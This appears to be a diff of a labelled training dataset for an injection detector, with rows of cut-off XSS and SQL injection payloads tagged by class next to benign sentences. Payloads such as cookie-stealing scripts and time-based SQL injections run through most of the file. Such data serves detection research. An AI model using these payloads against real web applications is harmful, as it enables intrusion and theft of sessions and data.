-"<menu onmousemove=""alert(1)"">test</menu>",1,XSS,4946 -"1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( ",2,SQLi,15650 -1' ) where 2753 = 2753 and ( 2739 = 8047 ) *8047--,2,SQLi,12238 -"<style onkeyup=""alert(1)"" contenteditable>test</st",1,XSS,6047 -"<maction actiontype=""statusline#http://google.com""",1,XSS,9228 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5586 -Group data where valid.,0,normal,23304 -<rp id=x tabindex=1 ondeactivate=alert(1)></rp><in,1,XSS,5591 -"<IMG SRC=x onplay=""alert(String.fromCharCode(88,83",1,XSS,1229 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,18692 -lead,0,normal,23231 -"1"" ) ) as gawq where 4728 = 4728 or 7417 = ( selec",2,SQLi,13342 -"1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706",2,SQLi,13334 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14744 -<dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><,1,XSS,8245 -Select the perfect honeymoon resort.,0,normal,24372 -"-2222' in boolean mode ) union all select 7649,764",2,SQLi,16238 -"<blockquote oncontextmenu=""alert(1)"">test</blockqu",1,XSS,6556 --8248 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,15374 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,12146 +"1%"" ) ) or ( select * from ( select ( sleep ( 5 ) ",2,SQLi,22338 +1' ) ) ) and ( select * from ( select ( sleep ( 5 ,2,SQLi,15278 +Where did you find that serene garden?,0,normal,23879 +<th onpointermove=alert(1)>XSS</th>,1,XSS,2439 +1%' ) ) ) or ( select * from ( select ( sleep ( 5 ,2,SQLi,22443 +1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch,2,SQLi,14090 +Merge the customer databases.,0,normal,22739 +"select * from users where id = 1 or "";."" = 1 or 1 ",2,SQLi,11992 +"<q ondblclick=""alert(1)"">test</q>",1,XSS,3170 +1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,18196 +Select your argument.,0,normal,24910 +Where's the hostel?,0,normal,23548 +"1%"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( (",2,SQLi,21473 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) --",2,SQLi,13755 +"1"" where 6111 = 6111 and 9660 = ( select count ( *",2,SQLi,15923 +1' ) waitfor delay '0:0:5' and ( 'vtfs' = 'vtfs,2,SQLi,14030 +"<head onmouseleave=""alert(1)"">test</head>",1,XSS,7019 +"-2377%' ) ) ) union all select 7706,7706--",2,SQLi,13389 +1'|| ( select 'bvic' from dual where 4839 = 4839 o,2,SQLi,16001 +"1"" where 2365 = 2365 and 3707 = ( select count ( *",2,SQLi,12644 +He'll select the wine.,0,normal,24465 +<svg onunload=window.open('javascript:alert(1)')>,1,XSS,4948 +1' ) as noqp where 4042 = 4042 or 8315 = ( select ,2,SQLi,15652 +-3921' ) as audo where 7087 = 7087 or 1755 = 4937-,2,SQLi,12240 +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6049 +<marquee loop=1 width=0 onfinish=alert(1)>,1,XSS,9230 +"<img draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5588 +Retrieve data where valid.,0,normal,23306 +"<colgroup draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,5593 +"<IMG SRC=x onplaying=""alert(String.fromCharCode(88",1,XSS,1230 +"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,18694 +rows,0,normal,23233 +-3688'|| ( select 'pber' from dual where 7137 = 71,2,SQLi,13344 +1 and 6802 = 3592--,2,SQLi,13336 +"1"" and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14746 +"<optgroup onmouseenter=""alert(1)"">test</optgroup>",1,XSS,8247 +It also includes a FOX live stream in select marke,0,normal,25974 +1' ) ) or 4915 = ( select count ( * ) from domain.,2,SQLi,16240 +<dd onpointerup=alert(1)>XSS</dd>,1,XSS,6558 +1' where 8950 = 8950 or 1022 = ( select count ( * ,2,SQLi,15376 +-7535 ) or 2724 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,12148 <form><input type=submit formaction=javascript:ale,1,XSS,160 -"<;FRAMESET>;<;FRAME SRC="";javascript:alert(';XSS';",1,XSS,1590 +"<;IFRAME SRC="";javascript:alert(';XSS';);"";>;<;/IF",1,XSS,1591 "{""id"":null,""firstName"":""桂英"",""lastName""",0,normal,27400 -"1' ) ) ) or row ( 1045,7562 ) > ( select count ( *",2,SQLi,15370 -<figcaption id=x tabindex=1 onfocusin=alert(1)></f,1,XSS,5566 -Create list.,0,normal,23072 -"<keygen draggable=""true"" ondrag=""alert(1)"">test</k",1,XSS,7191 -1,0,normal,26667 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10577 -select ( case when ( 3626 = 6022 ) then 3626 else ,2,SQLi,15062 -"1, ( select ( case when ( 2106 = 2106 ) then ( sel",2,SQLi,13365 -"<script a="">"" '' SRC=""http://www.securitycompass.c",1,XSS,1557 -"<basefont onpaste=""alert(1)"" contenteditable>test<",1,XSS,2829 +1' in boolean mode ) or 5286 = ( select count ( * ,2,SQLi,15372 +"<rp onmouseout=""alert(1)"">test</rp>",1,XSS,5568 +Filter posts.,0,normal,23074 +<noframes id=x tabindex=1 onactivate=alert(1)></no,1,XSS,7193 +If you are moving items you can select the destina,0,normal,26050 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10579 +1' ) as dwgv where 1525 = 1525 union all select nu,2,SQLi,15064 +1 ) ) rlike ( select ( case when ( 6113 = 1222 ) t,2,SQLi,13367 +"<script ""a='>'"" SRC=""http://www.securitycompass.co",1,XSS,1558 +<style>:target {color: red;}</style><object id=x s,1,XSS,2830 "<a href=""javas\x01cript:javascript:alert(1)"" id=""f",1,XSS,437 -select ( case when ( 8618 = 8706 ) then 8618 else ,2,SQLi,22174 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,15593 -"{""id"":null,""firstName"":""Jamus"",""lastName"":""Kwek"",""",0,normal,27151 -"select sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,17973 -"<style>@keyframes x{}</style><a style=""animation-n",1,XSS,2781 -<animatemotion onpointerover=alert(1)>XSS</animate,1,XSS,3702 -<svg><dialog onload=alert(1)></dialog>,1,XSS,5687 -1' ) ) ) or ( select 2* ( if ( ( select * from ( s,2,SQLi,20350 -<basefont id=x tabindex=1 onfocus=alert(1)></basef,1,XSS,4728 -"1"" ) as nyzd where 5305 = 5305",2,SQLi,17623 -<svg><caption onload=alert(1)></caption>,1,XSS,2952 -Where's the support group?,0,normal,23659 -<svg><rtc onload=alert(1)></rtc>,1,XSS,2556 -or sleep(5)#,2,SQLi,10351 -Where did you find that adorable puppy?,0,normal,23721 -begin user_lock.sleep ( 5 ),2,SQLi,17882 --1036' ) or 6872 = 6872 and ( 'wvbi' = 'wvbi,2,SQLi,12738 -"<map onkeydown=""alert(1)"" contenteditable>test</ma",1,XSS,6466 -"<footer onmouseleave=""alert(1)"">test</footer>",1,XSS,7356 -1%' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ,2,SQLi,15718 -"<iframe draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,7824 -1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,12450 -"Select the ""More"" button next to the video you wan",0,normal,25603 -"1%"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113",2,SQLi,15272 -<i id=x tabindex=1 onbeforeactivate=alert(1)></i>,1,XSS,5186 -"-4558"" or ( 3965 = 3933 ) *3933 and ""hmdb"" like ""h",2,SQLi,22032 -"<param onmouseover=""alert(1)"">test</param>",1,XSS,8550 -"<param oncut=""alert(1)"" contenteditable>test</para",1,XSS,5243 -1'|| ( select 'zqwd' where 1647 = 1647 rlike sleep,2,SQLi,18515 -"<dfn draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,2093 -1%' ) ) or 5286 = ( select count ( * ) from all_us,2,SQLi,21794 -OR x=y--,2,SQLi,10208 -""" or """"-""",2,SQLi,11949 +1 ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ,2,SQLi,22176 +"1 where 2751 = 2751 union all select null,null,nul",2,SQLi,15595 +"{""id"":null,""firstName"":""Nickson"",""lastName"":""Bingl",0,normal,27149 +1 ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||c,2,SQLi,17975 +"<iframe draggable=""true"" ondrag=""alert(1)"">test</i",1,XSS,2782 +<rp onblur=alert(1) tabindex=1 id=x></rp><input au,1,XSS,3704 +"<nobr onclick=""alert(1)"">test</nobr>",1,XSS,5689 +"1"" ) as qmtx where 5280 = 5280 or 4411 = ( select ",2,SQLi,20352 +<style>@keyframes slidein {}</style><command style,1,XSS,4730 +1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |,2,SQLi,17625 +<center id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,2953 +Where's the meditation center?,0,normal,23656 +"<dfn ondblclick=""alert(1)"">test</dfn>",1,XSS,2557 +"or sleep(5)=""",2,SQLi,10353 +I need to decide where to hold the conference.,0,normal,23718 +1' ) ) ) or exp ( ~ ( select * from ( select conca,2,SQLi,17884 +"select sleep ( 5 ) and ""%"" = """,2,SQLi,12740 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6468 +<style id=x tabindex=1 onfocus=alert(1)></style>,1,XSS,7358 +1 ) ) and 9660 = ( select count ( * ) from all_use,2,SQLi,15720 +"<blink draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7826 +"1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ",2,SQLi,12452 +Select the appropriate rating and add comments abo,0,normal,25600 +"1' ) where 6056 = 6056 or row ( 1045,7562 ) > ( se",2,SQLi,15274 +"<svg draggable=""true"" ondragend=""alert(1)"">test</s",1,XSS,5188 +1' ) as dpmh where 5281 = 5281 and 2006 = 2006,2,SQLi,22034 +<link href=validstyles.css rel=stylesheet onload=a,1,XSS,8552 +<basefont id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5245 +1 where 2239 = 2239 and 6969 = ( select 6969 from ,2,SQLi,18517 +"<script onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2094 +1%' and 9254 = ( select count ( * ) from rdb$field,2,SQLi,21796 +OR 3409=3409 AND ('pytW' LIKE 'pytY,2,SQLi,10210 +"x' AND 1 = ( SELECT COUNT ( * ) FROM tabname ) ,",2,SQLi,11951 <script>eval('alert(\61)')</script>,1,XSS,188 -Where's the best place to practice meditation?,0,normal,23971 -1' ) where 4092 = 4092 or char ( 75 ) ||char ( 70 ,2,SQLi,20040 -"1' ) where 5925 = 5925 union all select null,null,",2,SQLi,19811 -"On Tuesday, Democrats will select their nominees i",0,normal,25834 -&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;,1,XSS,1382 -Select next.,0,normal,24487 -"<summary onmouseleave=""alert(1)"">test</summary>",1,XSS,8606 -"1"" ) ) as wnzf where 3352 = 3352 or char ( 117 ) |",2,SQLi,15744 -"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,21422 -"1%' ) ) ) procedure analyse ( extractvalue ( 5840,",2,SQLi,21282 -""" ) or sleep ( __TIME__ ) = """,2,SQLi,11529 -"1%"" ) ) ) procedure analyse ( extractvalue ( 9255,",2,SQLi,19560 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,15039 -Specimens intended for the herbarium should be col,0,normal,25528 -Select connive.,0,normal,24749 -<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><in,1,XSS,8449 -select * from users where id = '1' * ( \ ) or 1 = ,2,SQLi,11391 +She chose a recipe to try from the cookbook.,0,normal,23968 +1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,20042 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19813 +She'll select the cake.,0,normal,24260 +&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;,1,XSS,1383 +Select slowly.,0,normal,24484 +"<em onbeforecut=""alert(1)"" contenteditable>test</e",1,XSS,8608 +1' ) ) as kpdl where 4443 = 4443 union all select ,2,SQLi,15746 +1 ) ) as berd where 5803 = 5803 union all select n,2,SQLi,21424 +1'|| ( select 'yrau' where 7860 = 7860 and 6414 = ,2,SQLi,21284 +"admin"" ) or ( ""1"" = ""1""--",2,SQLi,11531 +1' rlike ( select ( case when ( 5384 = 7060 ) then,2,SQLi,19562 +1 ) or 7552 = ( select count ( * ) from rdb$fields,2,SQLi,15041 +"First, select the Allow offline mail prompt to sta",0,normal,26186 +Select scheme.,0,normal,24746 +<style>:target {color: red;}</style><input id=x st,1,XSS,8451 +select * from users where id = 1 or \.<\ or 1 = 1 ,2,SQLi,11393 "{""id"":null,""name"":""bell""}",0,normal,27483 -"<li onkeyup=""alert(1)"" contenteditable>test</li>",1,XSS,7296 -1' ) as ihsc where 3978 = 3978,2,SQLi,18620 -<details id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,8069 -1 ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ,2,SQLi,12936 -%' or '0'='0,2,SQLi,9960 -"1' ) where 8628 = 8628 union all select null,null,",2,SQLi,20621 -Let's choose a destination for our next trip.,0,normal,23848 -Select the right tools for the job.,0,normal,24239 -"<?xml:namespace prefix=""t"" ns=""urn:schemas-microso",1,XSS,9765 +<title onpointerout=alert(1)>XSS</title>,1,XSS,7298 +select ( case when ( 4660 = 4660 ) then 4660 else ,2,SQLi,18622 +"<colgroup onmouseup=""alert(1)"">test</colgroup>",1,XSS,8071 +"-4031%"" union all select 9566--",2,SQLi,12938 +or 1=1--,2,SQLi,9962 +1'|| ( select 'awba' from dual where 3749 = 3749 a,2,SQLi,20623 +She chose a beautiful dress for the occasion.,0,normal,23845 +"{""id"":null,""firstName"":""Nurul"",""lastName"":""Asyikin",0,normal,27586 +"echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,9767 <body onmessage=print()>,1,XSS,25 -<svg/onload=alert('')>,1,XSS,3364 -"&lt;SCRIPT/SRC=\""http&#58;//ha&#46;ckers&#46;org/x",1,XSS,1089 -1 where 8506 = 8506,2,SQLi,12867 -"""),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:2",2,SQLi,10887 -select * from users where id = '1' <@&1 or 1 = 1 -,2,SQLi,11591 -"""Donald Trump Won Because of Facebook,"" the blog S",0,normal,26462 -"-7307' ) ) union all select 5215,5215,5215,5215--",2,SQLi,19226 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10504 --3899' ) where 8152 = 8152 or 3440 = cast ( ( chr ,2,SQLi,12307 -"1 ) and ( select 9067 from ( select count ( * ) ,c",2,SQLi,20537 -1 ) ) as xutu where 5811 = 5811 or char ( 75 ) ||c,2,SQLi,17080 -"1 ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745",2,SQLi,15907 -Guys are seriously starting to understand that the,0,normal,26498 -"select * from users where id = 1 or ""1{"" or 1 = 1 ",2,SQLi,11945 -<noframes id=x tabindex=1 onfocusin=alert(1)></nof,1,XSS,6338 -"-2067"" or 3038 = 3038",2,SQLi,17612 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18384 +"<bgsound onkeydown=""alert(1)"" contenteditable>test",1,XSS,3366 +"&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&",1,XSS,1090 +1' ) as inid where 7812 = 7812 or 6793 = ( select ,2,SQLi,12869 +",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:",2,SQLi,10889 +"23 or 1 = 1, --",2,SQLi,11593 +"""I don't think they will select me again,"" he said",0,normal,26459 +"1' ) and elt ( 5245 = 9203,9203 ) and ( 'fhlw' lik",2,SQLi,19228 +"UNION ALL SELECT 1,2",2,SQLi,10506 +"1%"" ) ) ) and 7533 = 7533 and ( ( ( ""%"" = """,2,SQLi,12309 +"1%"" ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( ",2,SQLi,20539 +"1"" ) and 6537 = dbms_pipe.receive_message ( chr ( ",2,SQLi,17082 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,15909 +Guys seriously start realizing league of legends i,0,normal,26495 +select * from users where id = '1' or $<\ union se,2,SQLi,11947 +<plaintext onpointerup=alert(1)>XSS</plaintext>,1,XSS,6340 +1' in boolean mode ) procedure analyse ( extractva,2,SQLi,17614 +1 and ( select 2* ( if ( ( select * from ( select ,2,SQLi,18386 "<STYLE>BODY{-moz-binding:url(""http://xss.rocks/xss",1,XSS,277 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,12414 -"-5928"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""rg",2,SQLi,22314 -"1' ) ) or row ( 1045,7562 ) > ( select count ( * )",2,SQLi,19338 -select ( case when ( 1093 = 7693 ) then 1093 else ,2,SQLi,20022 -<acronym id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,3907 -"-9601' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,21163 -"<caption onpaste=""alert(1)"" contenteditable>test</",1,XSS,5846 -"{""id"":null,""name"":""divide""}",0,normal,27208 -"-4692%"" ) ) union all select 1781,1781#",2,SQLi,20502 -%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22,1,XSS,1138 -1 ) where 7748 = 7748 and 9254 = ( select count ( ,2,SQLi,19152 -"-6546"" ) order by 1#",2,SQLi,18109 -"-5132%"" ) ) or 3038 = 3038",2,SQLi,13325 -Retrieve data where required.,0,normal,23365 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2491 -1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ,2,SQLi,21827 -1' ) as wnys where 6457 = 6457 or 8514 = benchmark,2,SQLi,16166 -"<bgsound onmouseout=""alert(1)"">test</bgsound>",1,XSS,7743 -1 ) or 8421 = ( select count ( * ) from generate_s,2,SQLi,14483 -1'|| ( select 'mwmn' where 5112 = 5112 or ( select,2,SQLi,13128 -<ol onpointerout=alert(1)>XSS</ol>,1,XSS,3936 --9688%' ) ) or 2724 in ( ( char ( 113 ) +char ( 11,2,SQLi,15073 -<address onpointermove=alert(1)>XSS</address>,1,XSS,2385 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8017 -<bdo id=x tabindex=1 onbeforeactivate=alert(1)></b,1,XSS,7085 -"-2766%' ) ) union all select 4458,4458,4458,4458,4",2,SQLi,16500 -"<link onkeydown=""alert(1)"" contenteditable>test</l",1,XSS,1864 -1 ) ) or 7552 = ( select count ( * ) from rdb$fiel,2,SQLi,15689 -"-7887' ) union all select 9049,9049,9049,9049,9049",2,SQLi,19504 -"-2951"" or 4493 = utl_inaddr.get_host_address ( chr",2,SQLi,20643 +"1"" ) ) as bbkl where 5686 = 5686",2,SQLi,12416 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,22316 +"1"" where 3274 = 3274 or ( select 9173 from ( selec",2,SQLi,19340 +1%' and ( select 2* ( if ( ( select * from ( selec,2,SQLi,20024 +"<h1 onmouseover=""alert(1)"">test</h1>",1,XSS,3909 +1 union all select null#,2,SQLi,21165 +<figure onpointerover=alert(1)>XSS</figure>,1,XSS,5848 +"{""id"":null,""firstName"":""Chenghong"",""lastName"":""Teo",0,normal,27206 +"1%"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,20504 +‘; alert(document.cookie); var foo=’,1,XSS,1139 +-1772' or 7911 = 4985#,2,SQLi,19154 +"-9032 ) ) union all select 8377,8377,8377,8377,837",2,SQLi,18111 +"1"" and 1668 = 8288",2,SQLi,13327 +Check values where needed.,0,normal,23367 +"<img onkeyup=""alert(1)"" contenteditable>test</img>",1,XSS,2492 +( select ( case when ( 4108 = 4108 ) then 1 else 4,2,SQLi,21829 +"1 and make_set ( 8403 = 8403,8899 ) # zysq",2,SQLi,16168 +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt,1,XSS,7745 +select ( case when ( 6839 = 2730 ) then 6839 else ,2,SQLi,14485 +"-8098%' ) union all select 5697,5697,5697,5697,569",2,SQLi,13130 +"<small onmouseover=""alert(1)"">test</small>",1,XSS,3938 +select case when 5559 = 3483 then 1 else null end-,2,SQLi,15075 +<section id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,2386 +<div onblur=alert(1) tabindex=1 id=x></div><input ,1,XSS,8019 +"<element onclick=""alert(1)"">test</element>",1,XSS,7087 +1'|| ( select 'nzjz' where 3539 = 3539 and 8148 = ,2,SQLi,16502 +<command onpointerover=alert(1)>XSS</command>,1,XSS,1865 +"1' and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,15691 +"-7111 union all select 2409,2409,2409,2409,2409,24",2,SQLi,19506 +-4644 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,20645 "<body src=1 href=1 onerror=""javascript:alert(1)""><",1,XSS,365 -"<div id=""100""><img[a][b]src=x[d]onerror[c]=[e]""ale",1,XSS,9095 -"-6118 union all select 5906,5906,5906,5906,5906#",2,SQLi,19204 -Select a workout routine to stay fit.,0,normal,24195 -Select the appropriate time for the meeting.,0,normal,23997 -"1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ",2,SQLi,18355 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,21084 -"<thead oncut=""alert(1)"" contenteditable>test</thea",1,XSS,3803 -"1' and make_set ( 8403 = 8403,8899 ) and 'lnwe' = ",2,SQLi,15310 -1 ) as zmxb where 8424 = 8424 and 2853 = cast ( ( ,2,SQLi,22453 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3537 -"<label onmousemove=""alert(1)"">test</label>",1,XSS,3826 -"<base onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,6643 -Save 25% off select Certified Refurbished Philips ,0,normal,25729 -select ( case when ( 2716 = 8138 ) then 2716 else ,2,SQLi,12992 -"1 ) union all select null,null,null,null,null,null",2,SQLi,18331 -1%' ) ) ) or sleep ( 5 ) #,2,SQLi,20879 -Select the perfect lighting for the ambiance.,0,normal,24208 -1 ) or sleep ( 5 ),2,SQLi,13528 -"<nobr draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,7270 -Select carefully.,0,normal,24480 -"<style>@keyframes x{}</style><rp style=""animation-",1,XSS,7930 -"1"" ) ) ) or 7552 = ( select count ( * ) from rdb$f",2,SQLi,12983 -<style>:target {color:red;}</style><legend id=x st,1,XSS,7167 -1%' ) ) ) and 8407 = ( select count ( * ) from gen,2,SQLi,12870 -Index columns where necessary.,0,normal,23348 -"<base draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,5868 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4762 +"<div id=""105""><iframe src=""data:image/svg-xml,%1F%",1,XSS,9097 +"-2106"" or 4493 = utl_inaddr.get_host_address ( chr",2,SQLi,19206 +Select a style for your blog layout.,0,normal,24192 +Select a fitness class to stay healthy.,0,normal,23994 +-1641' union all select 4835#,2,SQLi,18357 +"1"" and ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,21086 +"<style>@keyframes x{}</style><optgroup style=""anim",1,XSS,3805 +1 ) waitfor delay '0:0:5'--,2,SQLi,15312 +1 ) ) as queb where 2449 = 2449 union all select n,2,SQLi,22455 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3539 +"<html onkeyup=""alert(1)"" contenteditable>test</htm",1,XSS,3828 +"<address onbeforepaste=""alert(1)"" contenteditable>",1,XSS,6645 +Save up to 25% off select Gardening Tools and Supp,0,normal,25726 +"1"" ) where 6478 = 6478 union all select null,null,",2,SQLi,12994 +1'+ ( select 'rpds' where 5870 = 5870 and 4595 = 4,2,SQLi,18333 +select ( case when ( 1014 = 4280 ) then 1014 else ,2,SQLi,20881 +Select the best course for your career.,0,normal,24205 +"1%' ) and 4241 = convert ( int, ( select char ( 11",2,SQLi,13530 +<map onpointerleave=alert(1)>XSS</map>,1,XSS,7272 +Select your preferred dish.,0,normal,24477 +<caption onpointerenter=alert(1)>XSS</caption>,1,XSS,7932 +1 ) or 2633 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,12985 +setTimeout(,1,XSS,7169 +waitfor delay '0:0:5' and ( ( 'nvqf' = 'nvqf,2,SQLi,12872 +Identify columns where required.,0,normal,23350 +"<mark onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5870 +<multicol id=x tabindex=1 onactivate=alert(1)></mu,1,XSS,4764 "<object data=""http://corkami.googlecode.com/svn/!s",1,XSS,883 -1 rlike ( select ( case when ( 6795 = 5898 ) then ,2,SQLi,13894 -Select Settings —> Apps —-> App Settings —> Show A,0,normal,25612 +"1%"" ) and 3754 = ( select upper ( xmltype ( chr ( ",2,SQLi,13896 +"Select Taskbar texture, click the three dots, and ",0,normal,25609 `'><script>\xEF\xBB\xBFjavascript:alert(1)</script,1,XSS,558 -<title onpointerenter=alert(1)>XSS</title>,1,XSS,1961 -select sleep ( 5 ) and ( ( 'keoy' = 'keoy,2,SQLi,13332 -"<IMG SRC=x ondragend=""alert(String.fromCharCode(88",1,XSS,1208 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7685 -select sleep ( 5 ) and ( ( ( 'qjsc' = 'qjsc,2,SQLi,16860 -Merge the data tables for a comprehensive view.,0,normal,22923 -""" or ""a"" = ""a",2,SQLi,12022 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10486 --6412%' or 4065 = 5815 and '%' = ',2,SQLi,19596 -"<abbr onmouseenter=""alert(1)"">test</abbr>",1,XSS,3631 -"><s%2b""cript>alert(document.cookie)</script>",1,XSS,1709 -</script><script >alert(document.cookie)</script>,1,XSS,1141 -1 and 8398 = 1891-- naov,2,SQLi,19547 -"<bdi draggable=""true"" ondrag=""alert(1)"">test</bdi>",1,XSS,6208 -"The president of the republic, Kruger, however, ha",0,normal,25391 --6202 ) ) or 7845 = 1962--,2,SQLi,20115 -Please select a venue.,0,normal,24357 -"<noscript onpaste=""alert(1)"" contenteditable>test<",1,XSS,2661 --8523 ) as hzqs where 8944 = 8944 order by 1--,2,SQLi,14853 -"<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0;url=javas",1,XSS,1308 -1'|| ( select 'ogyu' from dual where 6691 = 6691,2,SQLi,18952 -1 and ( 3437 = 2271 ) *2271,2,SQLi,16213 -"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,12453 -"1"" and elt ( 4249 = 4249,7259 ) and ""tmxx"" = ""tmxx",2,SQLi,19219 -<spacer onpointermove=alert(1)>XSS</spacer>,1,XSS,6906 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11928 -1' ) ) and 6414 = ( select count ( * ) from rdb$fi,2,SQLi,14073 -[a](javascript:alert&#65534;(1&#41;),1,XSS,9430 -<strong id=x tabindex=1 onfocusin=alert(1)></stron,1,XSS,2152 -"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,20220 -"{""id"":null,""firstName"":""Low"",""lastName"":""Bee"",""spe",0,normal,27204 -Sort the cards.,0,normal,22801 -You can move the joystick to the left to select th,0,normal,25091 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,13284 -<button onpointerout=alert(1)>XSS</button>,1,XSS,5005 -Join for lunch.,0,normal,23011 -1' in boolean mode ) and 2006 = 2006,2,SQLi,15997 -"<;XSS STYLE="";behavior: url(http://ha.ckers.org/xs",1,XSS,1628 -"-8124 ) union all select 7251,7251,7251#",2,SQLi,19841 -<script>parent['alert'](1)</script>,1,XSS,9715 -"-7627%"" ) ) union all select 4011,4011,4011,4011,4",2,SQLi,21316 +<frameset onpointerup=alert(1)>XSS</frameset>,1,XSS,1962 +"1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706",2,SQLi,13334 +"<IMG SRC=x ondragenter=""alert(String.fromCharCode(",1,XSS,1209 +"<noframes draggable=""true"" ondragenter=""alert(1)"">",1,XSS,7687 +"-2857%' ) ) ) union all select 7167,7167,7167,7167",2,SQLi,16862 +Modify the security settings for your account.,0,normal,22925 +"benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,12024 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10488 +1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,19598 +"<track draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,3633 +<marquee onstart='javascript:alert('1');'>=(◕_◕)=,1,XSS,1710 +<img src=asdf onerror=alert(document.cookie)>,1,XSS,1142 +"1%"" ) ) and ( select 2* ( if ( ( select * from ( s",2,SQLi,19549 +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6210 +The primary goal of 1970s FISA reform was to creat,0,normal,25388 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20117 +Select the best hairstyle.,0,normal,24354 +<form onblur=alert(1) tabindex=1 id=x></form><inpu,1,XSS,2662 +"1"" ) and 3754 = ( select upper ( xmltype ( chr ( 6",2,SQLi,14855 +"<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0; URL=http",1,XSS,1309 +"1"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) )",2,SQLi,18954 +1'+ ( select 'plcm' where 2141 = 2141 and elt ( 31,2,SQLi,16215 +select ( case when ( 5740 = 7636 ) then 5740 else ,2,SQLi,12455 +select ( case when ( 9556 = 7122 ) then 9556 else ,2,SQLi,19221 +"<span 